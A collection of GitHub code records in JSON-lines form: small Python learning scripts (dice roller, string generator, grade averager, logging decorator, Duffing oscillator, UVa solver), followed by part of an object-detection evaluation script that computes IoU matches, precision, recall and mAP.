contain nine numbers.\")\n else:\n\n array = np.array(list).reshape(3, 3)\n calculations = {\n name: [fun(array, axis=x).tolist()\n for x in [0, 1, None]]\n for (name, fun)\n in zip(['mean', 'variance', 'standard deviation', 'max', 'min', 'sum'],\n [np.mean, np.var, np.std, np.max, np.min, np.sum])\n }\n return calculations\n","repo_name":"LuisTorres1304/FreeCodeCamp_Data_Analysis_with_Python","sub_path":"Mean-Variance-Standard Deviation Calculator/mean_var_std.py","file_name":"mean_var_std.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45115545986","text":"# Author: Emsii \r\n# Date: 13.12.2022 \r\n# https://github.com/EmsiiDiss\r\n\r\nimport random\r\nfrom datetime import datetime\r\n\r\nodstep = \" \" *8\r\nmin_val = 1\r\nmax_val = 6\r\n\r\ndef reset():\r\n global ilosc, liczba_1, liczba_2, liczba_3, liczba_4, liczba_5, liczba_6, kostka_sr, min_val, max_val, odstep, ile_razy \r\n liczba_1 = 0\r\n liczba_2 = 0 \r\n liczba_3 = 0 \r\n liczba_4 = 0 \r\n liczba_5 = 0\r\n liczba_6 = 0\r\n kostka_sr = 0\r\n ilosc = 0 \r\n ile_razy = 1\r\n\r\ndef liczba_roli():\r\n try:\r\n ile_razy = int(input(odstep + \"Ile razy chcesz rolować?\\n\"))\r\n except ValueError: \r\n ile_razy = 1\r\n baza(ile_razy)\r\n\r\ndef statystyki(statystyka, kostka, start):\r\n global ilosc, liczba_1, liczba_2, liczba_3, liczba_4, liczba_5, liczba_6, kostka_sr\r\n\r\n kostka_sr = (kostka_sr + kostka)\r\n if statystyka == 1 or statystyka == 2: \r\n if kostka == 1:\r\n liczba_1 = liczba_1 + 1\r\n elif kostka == 2:\r\n liczba_2 = liczba_2 + 1\r\n elif kostka == 3:\r\n liczba_3 = liczba_3 + 1\r\n elif kostka == 4:\r\n liczba_4 = liczba_4 + 1\r\n elif kostka == 5:\r\n liczba_5 = liczba_5 + 1\r\n elif kostka == 6:\r\n liczba_6 = liczba_6 + 1 \r\n \r\n if (statystyka == 1 or statystyka == 2) and start != 1: \r\n date2 = datetime.now()\r\n czas_minuty = int((date2 - date1).total_seconds()/60)\r\n czas_sekundy = int((date2 - date1).total_seconds()%60)\r\n print(\"\"\"\r\nStatystyki:\r\n 1-%r\r\n 2-%r\r\n 3-%r\r\n 4-%r\r\n 5-%r\r\n 6-%r\"\"\" \r\n % (liczba_1,liczba_2,liczba_3,liczba_4,liczba_5,liczba_6)\r\n )\r\n print(\"Średnio wypadało oczkek = \" + str(kostka_sr / ilosc)[0:4])\r\n print(\"Czas obliczeń = \" + str(czas_minuty) + \":\" + str(czas_sekundy))\r\n\r\n\r\ndef baza(ile_razy):\r\n global statystyka, date1, ilosc\r\n date1 = datetime.now()\r\n for i in range(0,ile_razy):\r\n kostka = random.randint(min_val,max_val)\r\n ilosc = ilosc + 1\r\n statystyki(statystyka, kostka, 1)\r\n print(char[kostka-1]) \r\n print(\"Kostka wylosowała = \" + str(kostka)+\"\\n\")\r\n \r\n\r\n statystyki(statystyka, 0, 0)\r\n resecik = input(\"Jeszcze raz? y/n\\n\")\r\n if resecik == \"y\" or resecik == \"Y\" or resecik == '':\r\n if statystyka != 2:\r\n reset()\r\n print(\"Okay!\")\r\n liczba_roli()\r\n else:\r\n print(\"Bye!\")\r\n\r\nchar = [(\"\"\"\r\n -------------\r\n | |\r\n | 0 |\r\n | |\r\n -------------\r\n \"\"\"),\r\n (\"\"\"\r\n -------------\r\n | 0 |\r\n | |\r\n | 0 |\r\n -------------\r\n \"\"\"),\r\n (\"\"\"\r\n -------------\r\n | 0 |\r\n | 0 |\r\n | 0 |\r\n -------------\r\n \"\"\"),\r\n (\"\"\"\r\n -------------\r\n | 0 0 |\r\n | |\r\n | 0 0 |\r\n -------------\r\n \"\"\"), \r\n (\"\"\"\r\n -------------\r\n | 0 0 |\r\n | 0 |\r\n | 0 0 |\r\n -------------\r\n \"\"\"), \r\n (\"\"\"\r\n -------------\r\n | 0 0 |\r\n | 0 0 |\r\n | 0 0 |\r\n -------------\r\n \"\"\"), \r\n ]\r\n\r\ndef main():\r\n reset()\r\n try:\r\n global statystyka\r\n print(\"\"\"\r\n 0 - brak statystyki,\r\n 1 - statystyka miękka,\r\n 2 - statystyka twarda,\r\n \"\"\")\r\n statystyka = int(input(odstep + \"Włączyć statystykę? 2/1/0\\n\"))\r\n \r\n except:\r\n print(\"Źle coś wprowadziłeś/aś - statystyka WYŁĄCZONA\") \r\n statystyka = 0\r\n statystyki(statystyka,0,1)\r\n liczba_roli()\r\n\r\ntry:\r\n main()\r\nexcept KeyboardInterrupt:\r\n statystyki(2,0,0)\r\n print(\"XDDD\") ","repo_name":"EmsiiDiss/PythonLearning","sub_path":"Dice Roll.py","file_name":"Dice Roll.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34887644202","text":"# Utwórz generator instancji testowych, który wygeneruje losowe ciągi znaków składające się\n# z jedynie z cyfr od 0-9. Upewnij się, że conajmniej 2 takie same znaki znajdą się w sekwencji.\n# Zmodyfikuj generator tak, by oczekiwał znaków podanych przez użytkownika np.\n# użytkownik podaje 4 znaki: ‘a’, ‘b’, ‘c’, ‘*’.\n# Zaimportuj generator bezpośrednio do programu.\nimport random\n\n\ndef main():\n \"\"\"Info and Menu of script\"\"\"\n print(f'This is a random sequence generator.')\n print(f'It can generate 30 char sequence from integer numbers from 0 to 9,'\n f' or sequence of characters given by user.')\n user_choice = ''\n user_options = ['u', 'c']\n while user_choice not in user_options:\n user_choice = input(f'If You want to give Your set of characters, press \"u\", if not, press \"c\" -> ').lower()\n if user_choice == 'c':\n num_gen()\n else:\n user_gen(user_set())\n\n\ndef user_set():\n \"\"\"Collect User set of characters\"\"\"\n user_choice_count = int(input(f'How many characters do You want to input -> '))\n user_char_list = []\n n = 1\n while user_choice_count > 0:\n user_character = input(f'Type character no {n} -> ')\n user_char_list.append(user_character)\n user_choice_count -= 1\n n += 1\n return user_char_list\n\n\ndef num_gen():\n \"\"\"Generate random string of numbers from 0 to 9\"\"\"\n test_string = ''\n for i in range(30):\n test_string += str(random.randrange(0, 9, 1))\n return test_string\n\n\ndef user_gen(char_list):\n \"\"\"Generate random string of characters given by user\"\"\"\n test_string = ''\n for i in range(30):\n test_string += str(random.choice(char_list))\n return test_string\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Adam-Kolowrocki/New_beginning","sub_path":"08_modules/06_FIND_IN_STRING/test_gen.py","file_name":"test_gen.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17175027079","text":"f=open('c:/Users/User/Desktop/input.txt', 'r')\r\nelevi=list(f)\r\nprint(f'Nr Numele Prenumele Nota1 Nota2 Nota3')\r\nb=open('c:/Users/User/Desktop/rezerva.txt', 'w')\r\nc=open('c:/Users/User/Desktop/output.txt', 'w')\r\nmedia=0\r\nfor i in elevi:\r\n elev=i.split()\r\n print(f'{elev[0]} {elev[1]} {elev[2]} {elev[3]} {elev[4]} {elev[5]}')\r\n b.write(f'{elev[0]}\\t{elev[1]}\\t{elev[2]}\\t{elev[3]}\\t{elev[4]}\\t{elev[5]}\\n')\r\n media=(float(elev[3])+float(elev[4])+float(elev[5]))/3\r\n c.write(f'{elev[0]}\\t{elev[1]}\\t{elev[2]}\\t{media}\\n')\r\nc.close()\r\nwith open('c:/Users/User/Desktop/output.txt', 'r') as c:\r\n elevi2=list(c)\r\nprint(f'Nr\\tNumele\\t\\tPrenumele\\tMedia')\r\nfor i in elevi2:\r\n elev=i.split()\r\n print(f'{elev[0]}\\t{elev[1]}\\t{elev[2]}\\t{elev[3]}')\r\nb.close()\r\nf.close()","repo_name":"elenamoglan/Evaluare-sumativ--Fi-iere","sub_path":"evaluare.py","file_name":"evaluare.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73896858067","text":"'''\nCreated on Jun 18, 2013\n\n@author: Yubin Bai\n\nAll rights reserved.\n'''\n\nimport time\nfrom multiprocessing.pool import Pool\nparallelSolve = False\nINF = 1 << 30\n\n\ndef solve(par):\n W, H, N, subs = par\n board = []\n for i in range(H + 1):\n board.append(list([False] * (W + 1)))\n\n for s in subs:\n x1, y1, x2, y2 = s\n x1, x2 = min(x1, x2), max(x1, x2)\n y1, y2 = min(y1, y2), max(y1, y2)\n for i in range(y1, y2 + 1):\n for j in range(x1, x2 + 1):\n board[i][j] = True\n\n counter = 0\n for i in range(1, H + 1):\n for j in range(1, W + 1):\n if not board[i][j]:\n counter += 1\n\n if counter == 1:\n return 'There is one empty spots.'\n elif counter == 0:\n return 'There is no empty spots.'\n else:\n return 'There are %d empty spots.' % counter\n\n\nclass Solver:\n\n def getInput(self):\n self.numOfTests = 0\n self.input = []\n while True:\n W, H, N = map(int, self.fIn.readline().split())\n if W == 0:\n break\n self.numOfTests += 1\n\n subs = []\n for i in range(N):\n subs.append(map(int, self.fIn.readline().split()))\n self.input.append((W, H, N, subs))\n self.fIn.readline()\n\n def __init__(self):\n self.fIn = open('input.txt')\n self.fOut = open('output.txt', 'w')\n self.results = []\n\n def parallel(self):\n self.getInput()\n p = Pool(4)\n millis1 = int(round(time.time() * 1000))\n self.results = p.map(solve, self.input)\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def sequential(self):\n self.getInput()\n millis1 = int(round(time.time() * 1000))\n for i in self.input:\n self.results.append(solve(i))\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def makeOutput(self):\n for test in range(self.numOfTests):\n self.fOut.write(\"%s\\n\" % self.results[test])\n self.fIn.close()\n self.fOut.close()\n\nif __name__ == '__main__':\n solver = Solver()\n if parallelSolve:\n solver.parallel()\n else:\n solver.sequential()\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 10703 - Free spots/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"23912710510","text":"import logging\n\n\ndef logging_decorator(fileName):\n def inner_decorator(f):\n def wrap(*args, **kwargs):\n logger = logging.getLogger('logName')\n if not logger.hasHandlers():\n hdlr = logging.FileHandler(fileName)\n hdlr.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))\n logger.addHandler(hdlr)\n logger.setLevel(logging.INFO)\n if len(args) == len(kwargs) == 0:\n logger.info('Function {0} was called'.format(f.__name__))\n elif len(kwargs) == 0:\n logger.info('Function {0} was called with args {1}'.format(f.__name__, args))\n elif len(args) == 0:\n logger.info('Function {0} was called with kwargs {1}'.format(f.__name__,\n {x[0]: x[1] for x in kwargs.items()}))\n else:\n logger.info('Function {0} was called with args {1} and kwargs {2}'.format\n (f.__name__, args, {x[0]: x[1] for x in kwargs.items()}))\n f(*args, **kwargs)\n return wrap\n return inner_decorator\n\n\n@logging_decorator('testLog.txt')\ndef func(arg):\n print(arg)\n\n@logging_decorator('testLog.txt')\ndef awesomeFunc(arg1, arg2, arg3):\n print(arg1 + arg2 + arg3)\n\n@logging_decorator('testLog.txt')\ndef freakyFunc(**kwargs):\n for x in kwargs.values():\n print(x)\n\nif __name__ == '__main__':\n func(5)\n awesomeFunc(1, 2, 3)\n freakyFunc(b=5)","repo_name":"abelousova/python-diht-2014","sub_path":"homework06.04/LoggingDecorator.py","file_name":"LoggingDecorator.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73091241104","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport Duffing\n\n### time step, number of steps\ndt = 0.026179938779914945\nsteps = int(100e6)\ntime = np.arange(0,steps)*dt\n\n\n### initial conditions\nparticle_1 = Duffing.particle(\n position=0.5,\n velocity=0.0,\n mass=1.0,\n a=-1.0,\n b=1.0,\n f0=2.0,\n omega=2.4,\n gamma=0.1)\n\n### data arrays\nvelocity_1 = np.zeros(steps)\nposition_1 = np.zeros(steps)\nforce_1 = np.zeros(steps)\n\nvelocity_1[0] = particle_1.velocity\nposition_1[0] = particle_1.position\nforce_1[0] = particle_1.force\n\n### integrate\nfor i in range(1,steps):\n if i%10000 == 0 and i != 0:\n print('Step {} out of {}'.format(i,steps))\n particle_1.runge_kutta(dt)\n\n velocity_1[i] = particle_1.velocity\n position_1[i] = particle_1.position\n force_1[i] = particle_1.force\n\n#pe_1 = (-particle_1.forceparams['gamma']*velocity_1\n# +2*particle_1.forceparams['a']*position_1\n# -4*particle_1.forceparams['b']*position_1**3\n# +particle_1.forceparams['f0']*np.cos(particle_1.forceparams['omega']*time))\n\n### save the data\nperiod = 100\ndata = np.append(time.reshape(steps,1),position_1.reshape(steps,1),axis=1)\ndata = np.append(data,velocity_1.reshape(steps,1),axis=1)\nnp.savetxt('duffing.csv',data[::period,:])\n\n### plot\nfig, ax = plt.subplots()\nfig.set_size_inches(5,3,forward=True)\nfig.tight_layout(pad=2.5)\n\nax.plot(time,position_1,'k',lw=1.5) #,label=r'$x_0$=0.5')\n\n# configure the plot\nfor axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(1.5)\n\n#ax.set_ylim(-3,3)\n#ax.set_xlim(-0.02,0.52)\n\nax.minorticks_on()\nax.tick_params(which='both', width=1)\nax.tick_params(which='major', length=5)\nax.tick_params(which='minor', length=3, color='k')\nax.set_xlabel('time',labelpad=4,fontweight='normal',\n fontsize='large')\nax.set_ylabel('position',labelpad=4,fontweight='normal',\n fontsize='large')\n#ax.legend(frameon=False,prop={'size':'small'},ncol=2)\nfig.suptitle('Duffing Oscillator',y=0.97)\n#plt.savefig('duffing.png',format='png',dpi=300,bbox_inches='tight')\nplt.show()\n\n","repo_name":"silentforest89/CompFizz","sub_path":"Thijssen/Mine/Chapter1/StrangeAttractor/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41654852910","text":"#!/usr/bin/env python3\n\"\"\"\nProject title: CollembolAI\nAuthors: Stephan Weißbach, Stanislav Sys, Clément Schneider\nOriginal repository: https://github.com/stasys-hub/Collembola_AI.git\nModule title: match_groundtruth.py\nPurpose: match a given result json file with the groundtruth (test.json)\nDependencies: See ReadMe\nLast Update: 18.02.2022\n\"\"\"\n\nimport pandas as pd\nfrom itertools import product\nimport json\nimport numpy as np\nimport os\n\nfrom utils.cocoutils import *\nfrom postprocess.nms import *\nfrom utils.output_inference_images import *\nfrom utils.third_party_utils import plot_confusion_matrix\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nimport matplotlib.pyplot as plt\n\n\ndef match_true_n_pred_box(df_ttruth, df_pred, IoU_threshold=0.4):\n \"\"\"Match the ground truth annotations with the predicted annotations based on IoU, then merge ground truth\n and prediction dataframe on shared annotation, and output the merged dataframe\"\"\"\n matched = pd.DataFrame()\n df_pred[\"id_pred\"] = df_pred[\"id\"]\n df_pred[\"pred_box\"] = df_pred[\"box\"]\n df_ttruth[\"id_true\"] = df_ttruth[\"id\"]\n df_ttruth[\"true_box\"] = df_ttruth[\"box\"]\n df_ttruth[\"true_area\"] = df_ttruth[\"area\"]\n\n for image_id in df_pred.file_name.unique():\n # subset dataframe to only have predictions of one image\n sdf_pred = df_pred[df_pred[\"file_name\"] == image_id]\n sdf_ttruth = df_ttruth[df_ttruth[\"file_name\"] == image_id]\n sdf_ttruth = df_ttruth[df_ttruth[\"file_name\"] == image_id]\n # create one df with all possible combinations of predicted and groundtruth boxes\n df = pd.DataFrame(\n product(sdf_ttruth[\"id\"], sdf_pred[\"id\"]), columns=[\"id_true\", \"id_pred\"]\n )\n # add information from original dataframes\n df = df.merge(\n sdf_ttruth[[\"id_true\", \"true_box\", \"true_area\"]], how=\"left\", on=\"id_true\"\n ).merge(sdf_pred[[\"id_pred\", \"pred_box\", \"score\"]], how=\"left\", on=\"id_pred\")\n # compute intersection, union and IoU\n df[\"intersection\"] = df[[\"true_box\", \"pred_box\"]].apply(\n lambda x: x[0].intersection(x[1]).area, axis=1\n )\n df[\"union\"] = df[[\"true_box\", \"pred_box\"]].apply(\n lambda x: x[0].union(x[1]).area, axis=1\n )\n\n df[\"IoU\"] = df[\"intersection\"] / df[\"union\"]\n # filter for boxes that are below IoU threshold\n df = df[df[\"IoU\"] > IoU_threshold]\n # concat\n matched = pd.concat([matched, df], axis=0)\n # keep only best (by confidence score) predictions for each bbox\n df2 = matched.sort_values(by=\"score\", ascending=False)\n df2 = df2.drop_duplicates(subset=[\"id_pred\"], keep=\"first\")\n df2 = df2.drop_duplicates(subset=[\"id_true\"], keep=\"first\")\n # add information about correctness of prediction\n pairs = (\n df_ttruth[[\"id_true\", \"name\"]]\n .merge(df2[[\"id_true\", \"id_pred\"]], how=\"left\", on=\"id_true\")\n .merge(df2[[\"id_pred\", \"score\"]], how=\"outer\", on=\"id_pred\")\n .rename(columns={\"name\": \"name_true\"})\n )\n pairs = pairs.merge(df_pred[[\"id_pred\", \"name\", \"score\"]], how=\"outer\", on=\"id_pred\").rename(\n columns={\"name\": \"name_pred\"}\n )\n pairs['score'] = pairs['score_x'].where(pairs['score_x'].notnull(), pairs['score_y'])\n pairs[\"is_correct\"] = pairs[\"name_true\"] == pairs[\"name_pred\"]\n pairs[\"is_correct_class\"] = (pairs[\"name_true\"] == pairs[\"name_pred\"]).where(\n pairs.id_pred.notnull(), np.nan\n )\n return pairs\n\ndef IoU(row):\n '''Compute the IoU of truth/pred boxes in our matching dataframe'''\n return row[0].intersection(row[1]).area / row[0].union(row[1]).area\n\ndef precision(tp: int, fp: int) -> float:\n \"\"\"\n tp: number of True Positives\n fp: number of False Positives\n \"\"\"\n # handle potental error\n if (tp + fp) == 0:\n return 0\n else:\n return tp/(tp + fp)\n\ndef recall(true_positive: int, total_possible_positives: int) -> float:\n \"\"\"\n true_positive: number of True Positives\n total_possible_positives: TP + FN\n \"\"\"\n # avoid division by 0\n if total_possible_positives == 0:\n return 0\n else:\n return true_positive/total_possible_positives\n\ndef get_status_count(df_pairs):\n \"\"\"\n Count number of TP, FP and FN from the true/pred dataframe generated by function 'process_results' and return as dataframe of outcomes per class\n \"\"\"\n cls_value_counts = pd.concat([\n df_pairs.groupby('name_true')['id_true'].count().rename('Ground truth total'),\n df_pairs[df_pairs['status'] == 'True Positive'].groupby('name_true')['id_true'].count().rename('True positive'),\n df_pairs[df_pairs['status'] == 'False positive (background)'].groupby('name_pred')['id_pred'].count().rename('False positive background'),\n df_pairs[df_pairs['status'] == 'False negative (not detected)'].groupby('name_true')['id_true'].count().rename('False negative (not detected)'),\n df_pairs[df_pairs['status'] == 'Missclassified'].groupby('name_true')['id_true'].count().rename('False negative (from missclassification)'),\n df_pairs[df_pairs['status'] == 'Missclassified'].groupby('name_pred')['id_pred'].count().rename('False positive (from missclassification)')], axis=1).fillna(0)\n return cls_value_counts\n\ndef get_average_precision_recall_from_cls_vc(cls_value_counts):\n \"\"\" Return the macro average and the micro average recall and precision from the outcome dataframe (this is at a given IoU and\n and score threshold).\n Macro-average computes the metric independently for each class and then take the average.\n Micro-average aggregates the contributions of all classes to compute the average metric.\n \"\"\"\n\n # Micro metrics\n sum_value_counts = cls_value_counts.sum(axis=0)\n up = precision(\n sum_value_counts['True positive'],\n (sum_value_counts['False positive background'] +\n sum_value_counts['False positive (from missclassification)'])\n )\n ur = recall(sum_value_counts['True positive'], sum_value_counts['Ground truth total'])\n\n # Macro metrics\n mp = (cls_value_counts['True positive'] /\n (cls_value_counts['True positive'] +\n cls_value_counts['False positive background'] +\n cls_value_counts['False positive (from missclassification)'])).sum() / cls_value_counts.shape[0]\n mr = (cls_value_counts['True positive'] / cls_value_counts['Ground truth total']).sum() / cls_value_counts.shape[0]\n return up, ur, mp, mr\n\ndef get_mAP_from_TruthPred_df(pairs, verbose=True):\n \"\"\"\n Compute the mAP, as per the Pascal VOC competition standard, over all values of Recall.\n 'pairs' is the truth/pred DF outputed by function 'process_results'. Note that the mAP IoU threshold is equal to the parameter 'match_thresh'\n passed to 'process_results'\n \"\"\"\n\n df_new = pairs.sort_values(\"score\", ascending=False)\n # Remap the long FP,TP etc Definitions ->\n remap_values_dict = {'True Positive': 'TP',\n 'False negative (not detected)': 'FN',\n 'Missclassified': 'MIS',\n 'False positive (background)':'FP' }\n df_new = df_new.replace({\"status\": remap_values_dict})\n\n # calculate metrics per class\n recall_per_class = []\n precision_per_class = []\n classs_list = []\n\n # get class names (including nan)\n for i in df_new[\"name_true\"].unique():\n # subset by class\n\n TOTAL_GROUND_TRUTH = df_new[df_new[\"name_true\"] == i].shape[0]\n\n tmp_df = df_new[(df_new[\"name_true\"] == i) | (df_new[\"name_pred\"] == i)] # selecting all rows where class i is mentionned\n tmp_df = tmp_df.sort_values(\"score\", ascending=True)\n\n # get the amount of FN that never got detected (score = NaN, status = FN). This number is never going to change\n # Then drop those rows.\n always_false_negative = tmp_df[tmp_df['status'] == 'FN'].shape[0]\n tmp_df = tmp_df[tmp_df['status'] != 'FN']\n total_predictions = tmp_df.shape[0]\n\n # Create objects to collect metrics per class\n recall_list = []\n precision_list = []\n\n # Adding predictions one by one, from highest score to lowest\n for idx in range(total_predictions-1, 0-1, -1):\n subtmp_df = tmp_df.iloc[idx:total_predictions]\n true_positive = subtmp_df[subtmp_df['status'] == 'TP'].shape[0]\n false_positive = subtmp_df[subtmp_df['name_true'] != i].shape[0] # FP when the true name is not from class i (i.e, pred name is incorrectly from class i)\n false_negative = subtmp_df[subtmp_df['name_pred'] != i].shape[0] # FN when the predicted name is not from class i\n false_negative = false_negative + always_false_negative # FN are not useful for calculation, but still could be printed.\n\n # calculate metrics, store in lists\n recall_list.append(recall(true_positive, TOTAL_GROUND_TRUTH ))\n precision_list.append(precision(true_positive, false_positive))\n\n # append data for every class\n recall_per_class.append(recall_list)\n precision_per_class.append(precision_list)\n classs_list.append(i)\n\n #print(\"Species: \", i)\n #print(\"Total Detections (TP+FP): \", true_positive+false_positive)\n #print(\"TP: \", true_positive)\n #print(\"FP: \", false_positive)\n #print(\"FN: \", false_negative)\n\n # accumulated AP for all classes\n AP_acc = 0\n #AP_per_class = [] # CLEM: This variable is never used ???\n\n # perform AP calulation and plotting for every class\n for idx, species in enumerate(classs_list):\n # check if precision and recall have the same dims\n if len(recall_per_class[idx]) != len(precision_per_class[idx]):\n print(\"Dimension of recall and precision table do not fit!!\")\n else:\n # transform to np arrays and prepend 0 and 1 repectively for easy recursive calculation\n recalls = np.append(0,np.array(recall_per_class[idx]))\n precisions = np.append(1,np.array(precision_per_class[idx]))\n\n for i in range(0,len(precisions)):\n precisions[i] = max(precisions[i:])\n\n # Dropping duplicated recall values if any\n tdf=pd.DataFrame(data={'recalls':recalls,'precisions':precisions}).drop_duplicates(subset='recalls', keep='first')\n recalls = tdf['recalls'].values\n precisions = tdf['precisions'].values\n\n # calc AP per class (PASCAL VOC)\n AP = np.sum((recalls[1:] - recalls[:-1]) * precisions[:-1])\n if verbose:\n print(f\"{species} AP: {AP}\")\n AP_acc += AP\n\n mAP = AP_acc/(len(classs_list)-1)\n return mAP\n\ndef process_results(test_directory, train_directory, filename, nms_IoU=0.15,\n match_thresh=0.4, write_outputs=True, verbose=True, draw_n_plot=False, score_thresh=0.7):\n \"\"\"\n This block of code originally came from the CollembolAI.py script, within the \"start_evaluation_on_test\" function.\n It parses the results from detectron2, apply a few obvious cleaning on them (dropping insanly large bounding box\n and remove duplicated boxes).\n Then it compares the predicted annotations with the true annotations in order to estimate accuracy.\n Predicted labels and True labels are matched based on a IoU criterion.\n Its output is necessary for evaluation.\n \"\"\"\n\n with open(os.path.join(test_directory, filename), 'r') as j:\n tpred = json.load(j)\n\n print('\\n\\nLoading predictions and conducting non max supression')\n\n df_pred = coco2df(tpred)\n # Dropping predictions with score below the score_threshold.\n df_pred = df_pred[df_pred['score'] >= score_thresh]\n\n if nms_IoU > 0:\n df_pred = non_max_supression(df_pred, IoU_threshold=nms_IoU)\n\n # Loading ground ttruth labels (test set)\n with open(os.path.join(test_directory, \"test.json\"), 'r') as j:\n ttruth = json.load(j)\n df_ttruth = coco2df(ttruth)\n df_ttruth['id_true'] = df_ttruth['id']\n\n # Loading train set labels\n with open(os.path.join(train_directory, \"train.json\"), 'r') as j:\n train = json.load(j)\n df_train = coco2df(train)\n df_train['id_train'] = df_train['id']\n\n # Reporting the abundance of each labels in the train set, and in the test pictures (true and predicted.)\n tt_abundances = df_train.name.value_counts().to_frame().join(df_ttruth.name.value_counts(), lsuffix='_train', rsuffix='_test')\n tt_abundances.columns = ['Train', 'Test']\n\n\n if verbose:\n print('\\n\\nAbundance and area of each species in the train and test pictures (true and predicted)\\n')\n\n tt_abundances = tt_abundances.join(df_pred.name.value_counts())\\\n .join(df_ttruth.groupby('name').sum()['area'])\\\n .join(df_pred.groupby('name').sum()['area'], rsuffix=\"pred\")\n tt_abundances.columns = ['Train', 'Test True', 'Test Pred', 'Test True Area', 'Test Pred Area']\n tt_abundances['Perc Pred True'] = tt_abundances['Test Pred Area'] / tt_abundances['Test True Area'] * 100\n tt_abundances['Test True Contribution To Total Area'] = tt_abundances['Test True Area'] / tt_abundances['Test True Area'].sum() * 100\n tt_abundances['Test Pred Contribution To Total Area'] = tt_abundances['Test Pred Area'] / tt_abundances['Test Pred Area'].sum() * 100\n if verbose:\n print(tt_abundances.to_markdown())\n if write_outputs:\n tmpoutdir = os.path.join(test_directory, \"species_abundance_n_area.tsv\")\n tt_abundances.to_csv(tmpoutdir, sep='\\t')\n if verbose:\n print(f\"outputed to {tmpoutdir}\")\n\n # Matching ground ttruth and predictions.\n pairs = match_true_n_pred_box(df_ttruth, df_pred, IoU_threshold=match_thresh)\n\n # Asserting status of each match truth/pred: TP, Missclassified, FP (background) and FN (not detected).\n pairs['status'] = \"True Positive\"\n pairs['status'] = pairs['status'].where(pairs['name_true'] == pairs['name_pred'], 'Missclassified')\n pairs['status'] = pairs['status'].where(pairs['name_true'].notnull(), 'False positive (background)')\n pairs['status'] = pairs['status'].where(pairs['name_pred'].notnull(), 'False negative (not detected)')\n\n # For each classe (species), counting numbers TP, FP (background), FN (not detected),\n # FN (stemming from missclassification), FP (stemming from missclassification).\n cls_value_counts = get_status_count(pairs)\n\n if write_outputs:\n tmpoutdir = os.path.join(test_directory, \"outcome_counts_per_class.tsv\")\n if verbose:\n print(f'Writing the counts of TP, FP and FN to {tmpoutdir}')\n cls_value_counts.to_csv(tmpoutdir, sep='\\t')\n\n # Some general metrics to report in verbose mode\n total_true_labels = pairs.id_true.notnull().sum()\n true_labels_without_matching_preds = pairs.id_pred.isnull().sum()\n perc_detected_animals = 100 - (true_labels_without_matching_preds / total_true_labels * 100)\n perc_correct_class = pairs['is_correct_class'].sum() / pairs.dropna().shape[0] * 100\n\n if verbose:\n\n print(f'The test set represents a total of {total_true_labels} specimens.')\n print(f'The model produced {len(tpred[\"annotations\"])} prediction, of which {df_pred.shape[0]} remains after deduplication' +\n ' and removal of oversized bounding boxes.')\n print(f'{total_true_labels - true_labels_without_matching_preds} ({round(perc_detected_animals, 1)}% of the total) ' +\n 'of the actual specimens were correcly detected.' +\n f' Of those detected specimens, {int(pairs[\"is_correct_class\"].sum())} (= {round(perc_correct_class, 1)}%) where assigned to the correct species.')\n print( f'Of the predicted labels, {cls_value_counts[\"False positive background\"].sum()} '+\n f'(={round(cls_value_counts[\"False positive background\"].sum() / df_pred.shape[0] * 100, 1)}%) '+\n 'where false positive (background, not related to a real specimen)')\n\n\n # Adding outcomes on df_ttruth\n df_ttruth = df_ttruth.merge(pairs[pairs['name_true'].notnull()][['id_true', 'score', 'name_pred', 'is_correct_class']], on='id_true')\n df_ttruth['is_detected'] = df_ttruth['is_correct_class'].where(df_ttruth['is_correct_class'].isnull(), 1).fillna(0)\n\n pairs = pairs.merge(df_ttruth[['id_true', 'bbox']].rename(columns={'bbox': 'bbox_true'}), on='id_true', how='outer')\\\n .merge(df_pred[['id_pred', 'bbox']].rename(columns={'bbox': 'bbox_pred'}), on= 'id_pred', how='outer')\n\n pairs['box_true'] = pairs['bbox_true'].apply(lambda x: COCObox_2_shapely(x) if isinstance(x, list) else box(0,0,0,0))\n pairs['box_pred'] = pairs['bbox_pred'].apply(lambda x: COCObox_2_shapely(x) if isinstance(x, list) else box(0,0,0,0))\n pairs['IoU_truth_pred']= pairs[['box_true','box_pred']].apply(IoU, axis = 1)\n pairs = pairs.drop(labels=['score_x', 'score_y'], axis=1)\n\n if draw_n_plot:\n # Drawing the predicted annotations on the pictures\n #------------------------------------------------------------------------------------------------\n print('\\n\\nDrawing the predicted annotations of the test pictures to support visual verification')\n print('Do not use for testing or for training ! =)')\n\n draw_coco_bbox(df_pred, os.path.join(test_directory), test_directory,\n prefix=\"predicted\", line_width=10, fontsize = 150, fontYshift = -125)\n #------------------------------------------------------------------------------------------------\n\n # Plotting the confusion matrices\n #------------------------------------------------------------------------------------------------\n # 1. CM including only the detected true label\n\n mcm = confusion_matrix(pairs.dropna().name_true, pairs.dropna().name_pred.fillna('NaN'), labels = pairs.dropna().name_true.unique())\n disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.dropna().name_true.unique())\n fig, ax = plt.subplots(figsize=(10,10))\n 